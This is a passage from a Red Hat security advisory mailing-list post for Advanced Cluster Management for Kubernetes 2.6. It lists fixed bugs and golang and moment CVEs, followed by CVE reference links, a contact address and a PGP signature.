https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/install/index#installing

4. Bugs fixed (https://bugzilla.redhat.com/):

2065661 - assisted-service repo pin-latest.py script should allow custom tags to be pinned  
2066059 - assisted-service-build image is too big in size  
2076901 - assisted-service pin-latest.py script should exclude the postgres image  
2078531 - iPXE artifacts need to be served via HTTP  
2081281 - Implementing new service-agent protocol on agent side  
2090901 - Capital letters in install-config.yaml .platform.baremetal.hosts[].name cause bootkube errors  
2090906 - RHACM 2.6.0 images  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2093503 - Assisted service POD keeps crashing after a bare metal host is created  
2096106 - Assisted service triggers the worker nodes re-provisioning on the hub cluster when the converged flow is enabled  
2096445 - Assisted service POD keeps crashing after a bare metal host is created  
2096460 - Spoke BMH stuck "inspecting" when deployed via  the converged workflow  
2097696 - Fix assisted CI jobs that fail for cluster-info readiness  
2099277 - Nodes are required to have installation disks of at least 120GB instead of at minimum of 100GB  
2103703 - Automatic version upgrade triggered for oadp operator installed by cluster-backup-chart  
2104117 - Spoke BMH stuck ?available? after changing a BIOS attribute via the converged workflow  
2104984 - Infrastructure operator missing clusterrole permissions for interacting with mutatingwebhookconfigurations  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2105339 - Search Application button on the Application Table for Subscription applications does not Redirect  
2105357 - [UI] hypershift cluster creation error - n[0] is undefined  
2106347 - Submariner error looking up service account submariner-operator/submariner-addon-sa  
2106882 - Security Context Restrictions are restricting creation of some pods which affects the deployment of some applications  
2107049 - The clusterrole for global clusterset did not created by default  
2107065 - governance-policy-framework in CrashLoopBackOff state on spoke cluster: Failed to start manager {"error": "error listening on :8081: listen tcp :8081: bind: address already in use"}  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107370 - Helm Release resource recreation feature does not work with the local cluster  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal  
2108888 - Hypershift on AWS - control plane not running  
2109370 - The button to create the cluster is not visible  
2111203 - Add ocp 4.11 to filters for discovering clusters in ACM 2.6  
2111218 - Create cluster - Infrastructure page crashes  
2111651 - "View application" button on app table for Flux applications redirects to apiVersion=ocp instead of flux  
2111663 - Hosted cluster in Pending import state  
2111671 - Leaked namespaces after deleting hypershift deployment  
2111770 - [ACM 2.6] there is no node info for remote cluster in multiple hubs  
2111843 - The value of label expressions in the new placement for policy and policysets cannot be shown real-time from UI  
2112180 - The policy page is crashed after input keywords in the search box  
2112281 - config-policy-controller pod can't startup in the OCP3.11 managed cluster  
2112318 - Can't delete the objects which are re-created by policy when deleting the policy  
2112321 - BMAC reconcile loop never stops after changes  
2112426 - No cluster discovered due to x509: certificate signed by unknown authority  
2112478 - Value of delayAfterRunSeconds is not shown on the final submit panel and the word itself should not be wrapped.  
2112793 - Can't view details of the policy template when set the spec.pruneObjectBehavior as unsupported value  
2112803 - ClusterServiceVersion for release 2.6 branch references "latest" tag  
2113787 - [ACM 2.6] can not delete namespaces after detaching the hosted cluster  
2113838 - the cluster proxy-agent was deployed on the non-infra nodes  
2113842 - [ACM 2.6] must restart hosting cluster registration pod if update work-manager-addon cr to change installNamespace  
2114982 - Control plane type shows 'Standalone' for hypershift cluster  
2115622 - Hub fromsecret function doesn't work for hosted mode in multiple hub  
2115723 - Can't view details of the policy template for customer and hypershift cluster in hosted mode from UI  
2115993 - Policy automation details panel was not updated after editing the mode back to disabled  
2116211 - Count of violations with unknown status was not accurate when managed clusters have mixed status  
2116329 - cluster-proxy-agent not startup due to the imagepullbackoff on spoke cluster  
2117113 - The proxy-server-host was not correct in cluster-proxy-agent  
2117187 - pruneObjectBehavior radio selection cannot work well and always switch the first one template in multiple configurationPolicy templates  
2117480 - [ACM 2.6] infra-id of HypershiftDeployment doesn't work  
2118338 - Report the "namespace not found" error after clicked view yaml link of a policy in the multiple hub env  
2119326 - Can't view details of the SecurityContextConstraints policy for managed clusters from UI

5. References:

https://access.redhat.com/security/cve/CVE-2022-1012  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/cve/CVE-2022-32250  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxgd1NzjgjWX9erEAQhthxAAmNte0BmIACFV4tQqEOGBPpisyXhXsYni  
VvfuP/d5depm8nivue9FQ+RDZt31mzGhqstV5sSsNw9ep2MdvS8DVaVnBqTnFHGN  
EHNhvcDu2GUIXpXasPSeimyMjh7Q1wXFwpBXMtFI+V71WfV4ipkpkqWnENQ/oRJG  
Ga6PzNcIjgrllPzBpKiO+APFPDzz6oW1HQSSNoqocVuwd4B341kPbwoN7fvZxe4r  
fvLioHsM2sWNi+40Oy5UtyDK8A2njEA13i/95K/NMBNK7Hl0l8Rbf4846cUps+LB  
gWJqYvrnsi43D03mOZ8usMYYtQcq8SV4KGsQU3xccCKcy2hncasXZ4Q+uLyQl0fg  
keAVml/3A5r4JqHL1VIwCTbRveaP4+W57uo5hakfof8wU0TgHYQUkkOGVlx9loyc  
49wL1ooIMU4wI3ClkEKQ38PYMPsnCwCVf8mmaxVhr+WjMRxyOGhY868JfNfg0tmv  
IbP1KwTlKBM4ehEXzw0wk3F/ile+Gk1wtGp9k0HzoNGdck/PDItI61X9sMTTxSxI  
DM+0e5yRgGamfa47s+Td2XaM3Ib1jYZYkzHzaalxwUyNse3iOVcH5qvN//Ifhxdw  
3ONkXcsMan6kG3sJhgpO7FwXoMpJv0HmFS67fz0i/wBdXfhK5gStjmb/3DDMDrmx  
PF7ifQXx4qw=  
=XsDv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#ios